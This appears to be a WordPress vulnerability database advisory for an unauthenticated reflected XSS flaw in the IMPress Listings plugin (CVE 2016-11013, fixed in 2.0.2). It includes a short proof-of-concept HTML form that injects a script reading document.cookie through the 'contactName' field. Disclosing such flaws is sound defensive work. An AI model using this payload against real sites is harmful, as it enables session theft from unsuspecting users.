IMPress Listings <= 2.0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)



Proof of Concept
<html>
<head><title>IMPress Listings XSS Demo</title></head>
<body>
	<form action="http://demo.wp-listings.com/listings/1048-cherrywood-dr/" method="POST">
	<input type=hidden name=contactName value='"><script>alert(document.cookie);</script><"'>
	<input type=submit value="Test XSS">
	</form>
</body>
</html>

Affects Plugin

fixed in version 2.0.2

References

CVE 2016-11013
URL https://github.com/agentevolution/wp-listings/pull/52

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Kris
Submitter Website http://ctf.rip
Submitter Twitter @CTFKris
Views 6551
Verified No
WPVDB ID 8370

Timeline

Publicly Published 2016-01-27 (over 4 years ago)
Added 2016-01-28 (over 4 years ago)
Last Updated 2019-11-28 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin